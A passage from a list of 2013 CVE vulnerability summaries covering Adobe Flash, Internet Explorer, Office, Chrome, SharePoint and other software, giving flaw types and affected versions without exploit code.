and 3.x, and before 11.1.115.47 on Android 4.x [CVE-2013-1368] Buffer overflow in Adobe Flash Player before 10.3.183.63 and 11.x before 11.6.602.168 on Windows, before 10.3.183.61 and 11.x before 11.6.602.167 on Mac OS X, before 10.3.183.61 and 11.x before 11.2.202.270 on Linux, before 11.1.111.43 on Android 2.x and 3.x, and before 11.1.115.47 on Android 4.x [CVE-2013-1367] Buffer overflow in Adobe Flash Player before 10.3.183.63 and 11.x before 11.6.602.168 on Windows, before 10.3.183.61 and 11.x before 11.6.602.167 on Mac OS X, before 10.3.183.61 and 11.x before 11.2.202.270 on Linux, before 11.1.111.43 on Android 2.x and 3.x, and before 11.1.115.47 on Android 4.x [CVE-2013-1366] Buffer overflow in Adobe Flash Player before 10.3.183.63 and 11.x before 11.6.602.168 on Windows, before 10.3.183.61 and 11.x before 11.6.602.167 on Mac OS X, before 10.3.183.61 and 11.x before 11.2.202.270 on Linux, before 11.1.111.43 on Android 2.x and 3.x, and before 11.1.115.47 on Android 4.x [CVE-2013-1365] Buffer overflow in Adobe Flash Player before 10.3.183.63 and 11.x before 11.6.602.168 on Windows, before 10.3.183.61 and 11.x before 11.6.602.167 on Mac OS X, before 10.3.183.61 and 11.x before 11.2.202.270 on Linux, before 11.1.111.43 on Android 2.x and 3.x, and before 11.1.115.47 on Android 4.x [CVE-2013-1347] Microsoft Internet Explorer 8 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly allocated or (2) is deleted, as exploited in the wild in May 2013. [CVE-2013-1346] mpengine.dll in Microsoft Malware Protection Engine before 1.1.9506.0 on x64 platforms allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted file. [CVE-2013-1338] Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer Use After Free Vulnerability," a different vulnerability than CVE-2013-1303 and CVE-2013-1304. [CVE-2013-1336] The Common Language Runtime (CLR) in Microsoft .NET Framework 2.0 SP2, 3.5, 3.5.1, 4, and 4.5 does not properly check signatures, which allows remote attackers to make undetected changes to signed XML documents via unspecified vectors that preserve signature validity, aka "XML Digital Signature Spoofing Vulnerability." [CVE-2013-1335] Microsoft Word 2003 SP3 and Word Viewer allow remote attackers to execute arbitrary code via crafted shape data in a Word document, aka "Word Shape Corruption Vulnerability." [CVE-2013-1331] Buffer overflow in Microsoft Office 2003 SP3 and Office 2011 for Mac allows remote attackers to execute arbitrary code via crafted PNG data in an Office document, leading to improper memory allocation, aka "Office Buffer Overflow Vulnerability." [CVE-2013-1329] Integer signedness error in Microsoft Publisher 2003 SP3 allows remote attackers to execute arbitrary code via a crafted Publisher file that triggers a buffer underflow, aka "Publisher Buffer Underflow Vulnerability." [CVE-2013-1328] Microsoft Publisher 2003 SP3, 2007 SP3, and 2010 SP1 allows remote attackers to execute arbitrary code via a crafted Publisher file that triggers incorrect pointer handling, aka "Publisher Pointer Handling Vulnerability." [CVE-2013-1327] Integer signedness error in Microsoft Publisher 2003 SP3 allows remote attackers to execute arbitrary code via a crafted Publisher file that triggers an improper memory allocation, aka "Publisher Signed Integer Vulnerability." [CVE-2013-1323] Microsoft Publisher 2003 SP3 does not properly handle NULL values for unspecified data items, which allows remote attackers to execute arbitrary code via a crafted Publisher file, aka "Publisher Incorrect NULL Value Handling Vulnerability." [CVE-2013-1322] Microsoft Publisher 2003 SP3 does not properly check table range data, which allows remote attackers to execute arbitrary code via a crafted Publisher file, aka "Publisher Invalid Range Check Vulnerability." [CVE-2013-1321] Microsoft Publisher 2003 SP3 does not properly check the data type of an unspecified return value, which allows remote attackers to execute arbitrary code via a crafted Publisher file, aka "Publisher Return Value Validation Vulnerability." [CVE-2013-1320] Buffer overflow in Microsoft Publisher 2003 SP3 allows remote attackers to execute arbitrary code via a crafted Publisher file, aka "Publisher Buffer Overflow Vulnerability." [CVE-2013-1319] Microsoft Publisher 2003 SP3 does not properly check the return value of an unspecified method, which allows remote attackers to execute arbitrary code via a crafted Publisher file, aka "Publisher Return Value Handling Vulnerability." [CVE-2013-1318] Microsoft Publisher 2003 SP3 allows remote attackers to execute arbitrary code via a crafted Publisher file that triggers access to an invalid pointer, aka "Publisher Corrupt Interface Pointer Vulnerability." [CVE-2013-1317] Integer overflow in Microsoft Publisher 2003 SP3 allows remote attackers to execute arbitrary code via a crafted Publisher file that triggers an improper allocation-size calculation, aka "Publisher Integer Overflow Vulnerability." [CVE-2013-1316] Microsoft Publisher 2003 SP3 does not properly validate the size of an unspecified array, which allows remote attackers to execute arbitrary code via a crafted Publisher file, aka "Publisher Negative Value Allocation Vulnerability." [CVE-2013-1312] Use-after-free vulnerability in Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer Use After Free Vulnerability." [CVE-2013-1311] Use-after-free vulnerability in Microsoft Internet Explorer 8 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer Use After Free Vulnerability." [CVE-2013-1310] Use-after-free vulnerability in Microsoft Internet Explorer 6 and 7 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer Use After Free Vulnerability." [CVE-2013-1309] Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer Use After Free Vulnerability," a different vulnerability than CVE-2013-1308 and CVE-2013-2551. [CVE-2013-1308] Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer Use After Free Vulnerability," a different vulnerability than CVE-2013-1309 and CVE-2013-2551. [CVE-2013-1307] Use-after-free vulnerability in Microsoft Internet Explorer 8 and 9 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer Use After Free Vulnerability," a different vulnerability than CVE-2013-0811. [CVE-2013-1306] Use-after-free vulnerability in Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer Use After Free Vulnerability," a different vulnerability than CVE-2013-1313. [CVE-2013-1304] Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer Use After Free Vulnerability," a different vulnerability than CVE-2013-1303 and CVE-2013-1338. [CVE-2013-1303] Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer Use After Free Vulnerability," a different vulnerability than CVE-2013-1304 and CVE-2013-1338. [CVE-2013-1302] Microsoft Communicator 2007 R2, Lync 2010, Lync 2010 Attendee, and Lync Server 2013 do not properly handle objects in memory, which allows remote attackers to execute arbitrary code via an invitation that triggers access to a deleted object, aka "Lync RCE Vulnerability." [CVE-2013-1301] Microsoft Visio 2003 SP3 2007 SP3, and 2010 SP1 allows remote attackers to read arbitrary files via an XML document containing an external entity declaration in conjunction with an entity reference, aka "XML External Entities Resolution Vulnerability." [CVE-2013-1297] Microsoft Internet Explorer 6 through 8 does not properly restrict data access by VBScript, which allows remote attackers to perform cross-domain reading of JSON files via a crafted web site, aka "JSON Array Information Disclosure Vulnerability." [CVE-2013-1296] The Remote Desktop ActiveX control in mstscax.dll in Microsoft Remote Desktop Connection Client 6.1 and 7.0 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code via a web page that triggers access to a deleted object, and allows remote RDP servers to execute arbitrary code via unspecified vectors that trigger access to a deleted object, aka "RDP ActiveX Control Remote Code Execution Vulnerability." [CVE-2013-1290] Microsoft SharePoint Server 2013, in certain configurations involving legacy My Sites, does not properly establish default access controls for a SharePoint list, which allows remote authenticated users to bypass intended restrictions on reading list items via a direct request for a list's location, aka "Incorrect Access Rights Information Disclosure Vulnerability." [CVE-2013-1289] Cross-site scripting (XSS) vulnerability in Microsoft SharePoint Server 2010 SP1, Groove Server 2010 SP1, SharePoint Foundation 2010 SP1, and Office Web Apps 2010 SP1 allows remote attackers to inject arbitrary web script or HTML via a crafted string, aka "HTML Sanitization Vulnerability." [CVE-2013-1288] Use-after-free vulnerability in Microsoft Internet Explorer 8 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer CTreeNode Use After Free Vulnerability." [CVE-2013-1282] The LDAP service in Microsoft Active Directory, Active Directory Application Mode (ADAM), Active Directory Lightweight Directory Service (AD LDS), and Active Directory Services allows remote attackers to cause a denial of service (memory consumption and service outage) via a crafted query, aka "Memory Consumption Vulnerability." [CVE-2013-1192] The JAR files on Cisco Device Manager for Cisco MDS 9000 devices before 5.2.8, and Cisco Device Manager for Cisco Nexus 5000 devices, allow remote attackers to execute arbitrary commands on Windows client machines via a crafted element-manager.jnlp file, aka Bug IDs CSCty17417 and CSCty10802. [CVE-2013-1092] Multiple unquoted Windows search path vulnerabilities in Novell ZENworks Desktop Management (ZDM) 7 through 7.1 might allow local users to gain privileges via a Trojan horse "program" file in the C: folder, related to an attempted launch of (1) ZenRem32.exe or (2) wm.exe. [CVE-2013-1087] Cross-site scripting (XSS) vulnerability in the client in Novell GroupWise through 8.0.3 HP3, and 2012 through SP2, on Windows allows user-assisted remote attackers to inject arbitrary web script or HTML via the body of an e-mail message. [CVE-2013-0931] EMC RSA Authentication Agent 7.1.x before 7.1.2 on Windows does not enforce the Quick PIN Unlock timeout feature, which allows physically proximate attackers to bypass the passcode requirement for a screensaved session by entering a PIN after timeout expiration. [CVE-2013-0900] Race condition in the International Components for Unicode (ICU) functionality in Google Chrome before 25.0.1364.97 on Windows and Linux, and before 25.0.1364.99 on Mac OS X, allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors. [CVE-2013-0899] Integer overflow in the padding implementation in the opus_packet_parse_impl function in src/opus_decoder.c in Opus before 1.0.2, as used in Google Chrome before 25.0.1364.97 on Windows and Linux and before 25.0.1364.99 on Mac OS X and other products, allows remote attackers to cause a denial of service (out-of-bounds read) via a long packet. [CVE-2013-0898] Use-after-free vulnerability in Google Chrome before 25.0.1364.97 on Windows and Linux, and before 25.0.1364.99 on Mac OS X, allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors involving a URL. [CVE-2013-0897] Off-by-one error in the PDF functionality in Google Chrome before 25.0.1364.97 on Windows and Linux, and before 25.0.1364.99 on Mac OS X, allows remote attackers to cause a denial of service via a crafted document. [CVE-2013-0896] Google Chrome before 25.0.1364.97 on Windows and Linux, and before 25.0.1364.99 on Mac OS X, does not properly manage memory during message handling for plug-ins, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors. [CVE-2013-0894] Buffer overflow in the vorbis_parse_setup_hdr_floors function in the Vorbis decoder in vorbisdec.c in libavcodec in FFmpeg through 1.1.3, as used in Google Chrome before 25.0.1364.97 on Windows and Linux and before 25.0.1364.99 on Mac OS X and other products, allows remote attackers to cause a denial of service (divide-by-zero error or out-of-bounds array access) or possibly have unspecified other impact via vectors involving a zero value for a bark map size. [CVE-2013-0893] Race condition in Google Chrome before 25.0.1364.97 on Windows and Linux, and before 25.0.1364.99 on Mac OS X, allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors related to media. [CVE-2013-0892] Multiple unspecified vulnerabilities in the IPC layer in Google Chrome before 25.0.1364.97 on Windows and Linux, and before 25.0.1364.99 on Mac OS X, allow remote attackers to cause a denial of service or possibly have other impact via unknown vectors. [CVE-2013-0891] Integer overflow in Google Chrome before 25.0.1364.97 on Windows and Linux, and before 25.0.1364.99 on Mac OS X, allows remote attackers to cause a denial of service or possibly have unspecified other impact via a blob. [CVE-2013-0890] Multiple unspecified vulnerabilities in the IPC layer in Google Chrome before 25.0.1364.97 on Windows and Linux, and before 25.0.1364.99 on Mac OS X, allow remote attackers to cause a denial of service (memory corruption) or possibly have other impact via unknown vectors. [CVE-2013-0889] Google Chrome before 25.0.1364.97 on Windows and Linux, and before 25.0.1364.99 on Mac OS X, does not properly enforce a user gesture requirement before proceeding with a file download, which might make it easier for remote attackers to execute arbitrary code via a crafted file. [CVE-2013-0888] Skia, as used in Google Chrome before 25.0.1364.97 on Windows and Linux, and before 25.0.1364.99 on Mac OS X, allows remote attackers to cause a denial of service (out-of-bounds read) via vectors related to a "user gesture check for dangerous file downloads." [CVE-2013-0887] The developer-tools process in Google Chrome before 25.0.1364.97 on Windows and Linux, and before 25.0.1364.99 on Mac OS X, does not properly restrict privileges during interaction with a connected server, which has unspecified impact and attack vectors. [CVE-2013-0885] Google Chrome before 25.0.1364.97 on Windows and Linux, and before 25.0.1364.99 on Mac OS X, does not properly restrict API privileges during interaction with the Chrome Web Store, which has unspecified impact and attack vectors. [CVE-2013-0884] Google Chrome before 25.0.1364.97 on Windows and Linux, and before 25.0.1364.99 on Mac OS X, does not properly load Native Client (aka NaCl) code, which has unspecified impact and attack vectors. [CVE-2013-0883] Skia, as used in Google Chrome before 25.0.1364.97 on Windows and Linux, and before 25.0.1364.99 on Mac OS X, allows remote attackers to cause a denial of service (incorrect read operation) via unspecified vectors. [CVE-2013-0882] Google Chrome before 25.0.1364.97 on Windows and Linux, and before 25.0.1364.99 on Mac OS X, allows remote attackers to cause a denial of service (incorrect memory access) or possibly have unspecified other impact via a large number of SVG parameters. [CVE-2013-0881] Google Chrome before 25.0.1364.97 on Windows and Linux, and before 25.0.1364.99 on Mac OS X, allows remote attackers to cause a denial of service (incorrect read operation) via crafted data in the Matroska container format. [CVE-2013-0880] Use-after-free vulnerability in Google Chrome before 25.0.1364.97 on Windows and Linux, and before 25.0.1364.99 on Mac OS X, allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors related to databases. [CVE-2013-0879] Google Chrome before 25.0.1364.97 on Windows and Linux, and before 25.0.1364.99 on Mac OS X, does not properly implement web audio nodes, which allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via unknown vectors. [CVE-2013-0840] Google Chrome before 24.0.1312.56 does not validate URLs during the opening of new windows, which has unspecified impact and remote attack vectors. [CVE-2013-0830] The IPC layer in Google Chrome before 24.0.1312.52 on Windows omits a NUL character required for termination of an unspecified data structure, which has unknown impact and attack vectors. [CVE-2013-0811] Use-after-free vulnerability in Microsoft Internet Explorer 8 and 9 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer Use After Free Vulnerability," a different vulnerability than CVE-2013-1307. [CVE-2013-0799] Buffer overflow in the Mozilla Maintenance Service in Mozilla Firefox before 20.0, Firefox ESR 17.x before 17.0.5, Thunderbird before 17.0.5, and Thunderbird ESR 17.x before 17.0.5 on Windows allows local users to gain privileges via crafted arguments. [CVE-2013-0683] The DataSim and DataPid demonstration clients in Cogent Real-Time Systems Cogent DataHub before 7.3.0, OPC DataHub before 6.4.22, Cascade DataHub before 6.4.22 on Windows, and DataHub QuickTrend before 7.3.0 allow remote servers to cause a denial of service (incorrect pointer access and client crash) via malformed data in a formatted text command. [CVE-2013-0682] Cogent Real-Time Systems Cogent DataHub before 7.3.0, OPC DataHub before 6.4.22, Cascade DataHub before 6.4.22 on Windows, and DataHub QuickTrend before 7.3.0 do not properly handle exceptions, which allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via malformed data in a formatted text command, leading to out-of-bounds access to (1) heap or (2) stack memory. [CVE-2013-0681] Cogent Real-Time Systems Cogent DataHub before 7.3.0, OPC DataHub before 6.4.22, Cascade DataHub before 6.4.22 on Windows, and DataHub QuickTrend before 7.3.0 allow remote attackers to cause a denial of service (NULL pointer dereference and application crash) via malformed data in a formatted text command. [CVE-2013-0680] Stack-based buffer overflow in the web server in Cogent Real-Time Systems Cogent DataHub before 7.3.0, OPC DataHub before 6.4.22, Cascade DataHub before 6.4.22 on Windows, and DataHub QuickTrend before 7.3.0 allows remote attackers to cause a denial of service (daemon crash) or possibly execute arbitrary code via a long HTTP header. [CVE-2013-0650] Use-after-free vulnerability in Adobe Flash Player before 10.3.183.68 and 11.x before 11.6.602.180 on Windows and Mac OS X, before 10.3.183.68 and 11.x before 11.2.202.275 on Linux, before 11.1.111.44 on Android 2.x and 3.x, and before 11.1.115.48 on Android 4.x [CVE-2013-0649] Use-after-free vulnerability in Adobe Flash Player before 10.3.183.63 and 11.x before 11.6.602.168 on Windows, before 10.3.183.61 and 11.x before 11.6.602.167 on Mac OS X, before 10.3.183.61 and 11.x before 11.2.202.270 on Linux, before 11.1.111.43 on Android 2.x and 3.x, and before 11.1.115.47 on Android 4.x [CVE-2013-0648] Unspecified vulnerability in the ExternalInterface ActionScript functionality in Adobe Flash Player before 10.3.183.67 and 11.x before 11.6.602.171 on Windows and Mac OS X, and before 10.3.183.67 and 11.x before 11.2.202.273 on Linux, allows remote attackers to execute arbitrary code via crafted SWF content, as exploited in the wild in February 2013. [CVE-2013-0647] Adobe Flash Player before 10.3.183.63 and 11.x before 11.6.602.168 on Windows, before 10.3.183.61 and 11.x before 11.6.602.167 on Mac OS X, before 10.3.183.61 and 11.x before 11.2.202.270 on Linux, before 11.1.111.43 on Android 2.x and 3.x, and before 11.1.115.47 on Android 4.x [CVE-2013-0646] Integer overflow in Adobe Flash Player before 10.3.183.68 and 11.x before 11.6.602.180 on Windows and Mac OS X, before 10.3.183.68 and 11.x before 11.2.202.275 on Linux, before 11.1.111.44 on Android 2.x and 3.x, and before 11.1.115.48 on Android 4.x [CVE-2013-0645] Buffer overflow in Adobe Flash Player before 10.3.183.63 and 11.x before 11.6.602.168 on Windows, before 10.3.183.61 and 11.x before 11.6.602.167 on Mac OS X, before 10.3.183.61 and 11.x before 11.2.202.270 on Linux, before 11.1.111.43 on Android 2.x and 3.x, and before 11.1.115.47 on Android 4.x [CVE-2013-0644] Use-after-free vulnerability in Adobe Flash Player before 10.3.183.63 and 11.x before 11.6.602.168 on Windows, before 10.3.183.61 and 11.x before 11.6.602.167 on Mac OS X, before 10.3.183.61 and 11.x before 11.2.202.270 on Linux, before 11.1.111.43 on Android 2.x and 3.x, and before 11.1.115.47 on Android 4.x [CVE-2013-0643] The Firefox sandbox in Adobe Flash Player before 10.3.183.67 and 11.x before 11.6.602.171 on Windows and Mac OS X, and before 10.3.183.67 and 11.x before 11.2.202.273 on Linux, does not properly restrict privileges, which makes it easier for remote attackers to execute arbitrary code via crafted SWF content, as exploited in the wild in February 2013. [CVE-2013-0642] Buffer overflow in Adobe Flash Player before 10.3.183.63 and 11.x before 11.6.602.168 on Windows, before 10.3.183.61 and 11.x before 11.6.602.167 on Mac OS X, before 10.3.183.61 and 11.x before 11.2.202.270 on Linux, before 11.1.111.43 on Android 2.x and 3.x, and before 11.1.115.47 on Android 4.x [CVE-2013-0639] Integer overflow in Adobe Flash Player before 10.3.183.63 and 11.x before 11.6.602.168 on Windows, before 10.3.183.61 and 11.x before 11.6.602.167 on Mac OS X, before 10.3.183.61 and 11.x before 11.2.202.270 on Linux, before 11.1.111.43 on Android 2.x and 3.x, and before 11.1.115.47 on Android 4.x [CVE-2013-0638] Adobe Flash Player before 10.3.183.63 and 11.x before 11.6.602.168 on Windows, before 10.3.183.61 and 11.x before 11.6.602.167 on Mac OS X, before 10.3.183.61 and 11.x before 11.2.202.270 on Linux, before 11.1.111.43 on Android 2.x and 3.x, and before 11.1.115.47 on Android 4.x [CVE-2013-0637] Adobe Flash Player before 10.3.183.63 and 11.x before 11.6.602.168 on Windows, before 10.3.183.61 and 11.x before 11.6.602.167 on Mac OS X, before 10.3.183.61 and 11.x before 11.2.202.270 on Linux, before 11.1.111.43 on Android 2.x and 3.x, and before 11.1.115.47 on Android 4.x [CVE-2013-0634] Adobe Flash Player before 10.3.183.51 and 11.x before 11.5.502.149 on Windows and Mac OS X, before 10.3.183.51 and 11.x before 11.2.202.262 on Linux, before 11.1.111.32 on Android 2.x and 3.x, and before 11.1.115.37 on Android 4.x allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted SWF content, as exploited in the wild in February 2013. [CVE-2013-0633] Buffer overflow in Adobe Flash Player before 10.3.183.51 and 11.x before 11.5.502.149 on Windows and Mac OS X, before 10.3.183.51 and 11.x before 11.2.202.262 on Linux, before 11.1.111.32 on Android 2.x and 3.x, and before 11.1.115.37 on Android 4.x allows remote attackers to execute arbitrary code via crafted SWF content, as exploited in the wild in February 2013. [CVE-2013-0630] Buffer overflow in Adobe Flash Player before 10.3.183.50 and 11.x before 11.5.502.146 on Windows and Mac OS X, before 10.3.183.50 and 11.x before 11.2.202.261 on Linux, before 11.1.111.31 on Android 2.x and 3.x, and before 11.1.115.36 on Android 4.x [CVE-2013-0572] Cross-site scripting (XSS) vulnerability in IBM Document Connect for Application Support Facility (aka DC4ASF) before 1.0.0.1218 in Application Support Facility (ASF) 3.4 for z/OS on Windows, Linux, and AIX allows remote authenticated users to inject content, and conduct phishing attacks, via unspecified vectors. [CVE-2013-0571] Cross-site scripting (XSS) vulnerability in IBM Document Connect for Application Support Facility (aka DC4ASF) before 1.0.0.1218 in Application Support Facility (ASF) 3.4 for z/OS on Windows, Linux, and AIX allows remote attackers to inject arbitrary web script or HTML via a crafted URL. [CVE-2013-0541] Buffer overflow in IBM WebSphere Application Server (WAS) 6.1 before 6.1.0.47, 7.0 before 7.0.0.29, 8.0 before 8.0.0.6, and 8.5 before 8.5.0.2 on Windows, when a localOS registry is used in conjunction with WebSphere Identity Manger (WIM), allows local users to cause a denial of service (daemon crash) via unspecified vectors. [CVE-2013-0504] Buffer overflow in the broker service in Adobe Flash Player before 10.3.183.67 and 11.x before 11.6.602.171 on Windows and Mac OS X, and before 10.3.183.67 and 11.x before 11.2.202.273 on Linux, allows attackers to execute arbitrary code via unspecified vectors. [CVE-2013-0240] Gnome Online Accounts (GOA) 3.4.x, 3.6.x before 3.6.3, and 3.7.x before 3.7.5, does not properly validate SSL certificates when creating accounts such as Windows Live and Facebook accounts, which allows man-in-the-middle attackers to obtain sensitive information such as credentials by sniffing the network. [CVE-2013-0111] daemonu.exe (aka the NVIDIA Update Service Daemon), as distributed with the NVIDIA driver before 307.78, and Release 310 before 311.00, on Windows, lacks " (double quote) characters in the service path, which allows local users to gain privileges via a Trojan horse program. [CVE-2013-0110] nvSCPAPISvr.exe in the NVIDIA Stereoscopic 3D Driver service, as distributed with the NVIDIA driver before 307.78, and Release 310 before 311.00, on Windows, lacks " (double quote) characters in the service path, which allows local users to gain privileges via a Trojan horse program. [CVE-2013-0109] The NVIDIA driver before 307.78, and Release 310 before 311.00, in the NVIDIA Display Driver service on Windows does not properly handle exceptions, which allows local users to gain privileges or cause a denial of service (memory overwrite) via a crafted application. [CVE-2013-0095] Outlook in Microsoft Office for Mac 2008 before 12.3.6 and Office for Mac 2011 before 14.3.2 allows remote attackers to trigger access to a remote URL and consequently confirm the rendering of an HTML e-mail message by including unspecified HTML5 elements and leveraging the installation of a WebKit browser on the victim's machine, aka "Unintended Content Loading Vulnerability." [CVE-2013-0094] Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer removeChild Use After Free Vulnerability." [CVE-2013-0093] Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer onBeforeCopy Use After Free Vulnerability." [CVE-2013-0092] Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer GetMarkupPtr Use After Free Vulnerability." [CVE-2013-0091] Use-after-free vulnerability in Microsoft Internet Explorer 8 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer CElement Use After Free Vulnerability." [CVE-2013-0090] Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer CCaret Use After Free Vulnerability." [CVE-2013-0089] Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer CMarkupBehaviorContext Use After Free Vulnerability." [CVE-2013-0088] Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer saveHistory Use After Free Vulnerability." [CVE-2013-0087] Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer OnResize Use After Free Vulnerability." [CVE-2013-0086] Microsoft OneNote 2010 SP1 does not properly determine buffer sizes during memory allocation, which allows remote attackers to obtain sensitive information via a crafted OneNote file, aka "Buffer Size Validation Vulnerability." [CVE-2013-0085] Buffer overflow in Microsoft SharePoint Server 2010 SP1 and SharePoint Foundation 2010 SP1 allows remote attackers to cause a denial of service (W3WP process crash and site outage) via a crafted URL, aka "Buffer Overflow Vulnerability." [CVE-2013-0084] Directory traversal vulnerability in Microsoft SharePoint Server 2010 SP1 and SharePoint Foundation 2010 SP1 allows remote attackers to bypass intended read restrictions for content, and hijack user accounts, via a crafted URL, aka "SharePoint Directory Traversal Vulnerability." [CVE-2013-0083] Cross-site scripting (XSS) vulnerability in Microsoft SharePoint Server 2010 SP1 allows remote attackers to inject arbitrary web script or HTML via crafted content, leading to administrative command execution, aka "SharePoint XSS Vulnerability." [CVE-2013-0080] Microsoft SharePoint Server 2010 SP1 and SharePoint Foundation 2010 SP1 allow remote attackers to bypass intended read restrictions for content, and hijack user accounts, via a crafted URL, aka "Callback Function Vulnerability." [CVE-2013-0079] Microsoft Visio Viewer 2010 SP1 allows remote attackers to execute arbitrary code via a crafted Visio file that triggers incorrect memory allocation, aka "Visio Viewer Tree Object Type Confusion Vulnerability." [CVE-2013-0074] Microsoft Silverlight 5, and 5 Developer Runtime, before 5.1.20125.0 does not properly validate pointers during HTML object rendering, which allows remote attackers to execute arbitrary code via a crafted Silverlight application, aka "Silverlight Double Dereference Vulnerability." [CVE-2013-0030] The Vector Markup Language (VML) implementation in Microsoft Internet Explorer 6 through 10 does not properly allocate buffers, which allows remote attackers to execute arbitrary code via a crafted web site, aka "VML Memory Corruption Vulnerability." [CVE-2013-0029] Use-after-free vulnerability in Microsoft Internet Explorer 6 through 9 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer CHTML Use After Free Vulnerability." [CVE-2013-0028] Use-after-free vulnerability in Microsoft Internet Explorer 6 through 9 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer CObjectElement Use After Free Vulnerability." [CVE-2013-0027] Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer CPasteCommand Use After Free Vulnerability." [CVE-2013-0026] Use-after-free vulnerability in Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer InsertElement Use After Free Vulnerability." [CVE-2013-0025] Use-after-free vulnerability in Microsoft Internet Explorer 8 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer SLayoutRun Use After Free Vulnerability." [CVE-2013-0024] Use-after-free vulnerability in Microsoft Internet Explorer 8 and 9 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer pasteHTML Use After Free Vulnerability." [CVE-2013-0023] Use-after-free vulnerability in Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer CDispNode Use After Free Vulnerability." [CVE-2013-0022] Use-after-free vulnerability in Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer LsGetTrailInfo Use After Free Vulnerability." [CVE-2013-0021] Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer vtable Use After Free Vulnerability." [CVE-2013-0020] Use-after-free vulnerability in Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer CMarkup Use After Free Vulnerability." [CVE-2013-0019] Use-after-free vulnerability in Microsoft Internet Explorer 7 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer COmWindowProxy Use After Free Vulnerability." [CVE-2013-0018] Use-after-free vulnerability in Microsoft Internet Explorer 6 through 9 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer SetCapture Use After Free Vulnerability." [CVE-2013-0015] Microsoft Internet Explorer 6 through 9 does not properly perform auto-selection of the Shift JIS encoding, which allows remote attackers to read content from a different (1) domain or (2) zone via a crafted web site that triggers cross-domain scrolling events, aka "Shift JIS Character Encoding Vulnerability." [CVE-2013-0010] Cross-site scripting (XSS) vulnerability in Microsoft System Center Operations Manager 2007 SP1 and R2 allows remote attackers to inject arbitrary web script or HTML via crafted input, aka "System Center Operations Manager Web Console XSS Vulnerability," a different vulnerability than CVE-2013-0009. [CVE-2013-0009] Cross-site scripting (XSS) vulnerability in Microsoft System Center Operations Manager 2007 SP1 and R2 allows remote attackers to inject arbitrary web script or HTML via crafted input, aka "System Center Operations Manager Web Console XSS Vulnerability," a different vulnerability than CVE-2013-0010. [CVE-2013-0007] Microsoft XML Core Services (aka MSXML) 4.0, 5.0, and 6.0 does not properly parse XML content, which allows remote attackers to execute arbitrary code via a crafted web page, aka "MSXML XSLT Vulnerability." [CVE-2013-0006] 